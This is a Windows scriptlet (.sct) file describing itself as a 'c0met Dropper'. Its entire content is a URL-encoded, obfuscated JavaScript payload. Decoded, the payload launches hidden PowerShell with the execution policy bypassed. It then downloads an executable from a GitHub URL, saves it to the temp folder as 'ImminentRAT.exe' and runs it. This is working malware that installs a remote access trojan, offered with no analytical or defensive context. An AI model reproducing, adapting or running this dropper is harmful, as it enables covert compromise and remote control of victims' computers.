<?XML version="1.0"?>
<scriptlet>

<registration
    description="c0met Dropper"
    progid="c1ropper"
    version="1.00"
    classid="{B3EE9B60-8585-460E-8FC0-82AF2E90DDBA}"
	>
	<script language="javascript">
<!--
// == Begin Free HTML Source Code Obfuscation Protection from http://snapbuilder.com == //
document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%4A%53%63%72%69%70%74%22%3E%0A%09%09%3C%21%5B%43%44%41%54%41%5B%0A%09%09%0A%20%20%20%20%20%20%20%20%20%20%20%20%76%61%72%20%57%69%73%68%20%3D%20%6E%65%77%20%41%63%74%69%76%65%58%4F%62%6A%65%63%74%28%22%57%53%63%72%69%70%74%2E%53%68%65%6C%6C%22%29%3B%0A%20%09%09%09%76%61%72%20%64%69%63%65%20%3D%20%22%24%64%6F%77%6E%20%3D%20%4E%65%77%2D%4F%62%6A%65%63%74%20%53%79%73%74%65%6D%2E%4E%65%74%2E%57%65%62%43%6C%69%65%6E%74%3B%24%75%72%6C%20%3D%20%27%68%74%74%70%73%3A%2F%2F%67%69%74%68%75%62%2E%63%6F%6D%2F%63%30%6D%65%74%2F%31%32%33%2E%73%63%74%2F%72%61%77%2F%6D%61%73%74%65%72%2F%77%65%65%77%67%65%67%2E%65%78%65%27%3B%24%66%69%6C%65%20%3D%20%27%25%54%4D%50%25%5C%5C%49%6D%6D%69%6E%65%6E%74%52%41%54%2E%65%78%65%27%3B%24%64%6F%77%6E%2E%44%6F%77%6E%6C%6F%61%64%46%69%6C%65%28%24%75%72%6C%2C%24%66%69%6C%65%29%3B%24%65%78%65%63%20%3D%20%4E%65%77%2D%4F%62%6A%65%63%74%20%2D%63%6F%6D%20%73%68%65%6C%6C%2E%61%70%70%6C%69%63%61%74%69%6F%6E%3B%24%65%78%65%63%2E%73%68%65%6C%6C%65%78%65%63%75%74%65%28%24%66%69%6C%65%29%3B%65%78%69%74%3B%22%3B%0A%20%09%09%09%76%61%72%20%70%30%77%72%73%68%65%6C%6C%20%3D%20%27%70%6F%77%65%72%73%68%65%6C%6C%2E%65%78%65%20%2D%45%78%65%63%75%74%69%6F%6E%50%6F%6C%69%63%79%20%42%79%70%61%73%73%20%2D%77%69%6E%64%6F%77%73%74%79%6C%65%20%68%69%64%64%65%6E%20%2D%43%6F%6D%6D%61%6E%64%20%27%3B%0A%20%09%09%09%57%69%73%68%2E%45%78%65%63%28%70%30%77%72%73%68%65%6C%6C%20%2B%20%64%69%63%65%29%3B%0A%20%20%20%20%0A%09%09%5D%5D%3E%0A%3C%2F%73%63%72%69%70%74%3E'));
//-->
</script>
</registration>

</scriptlet>
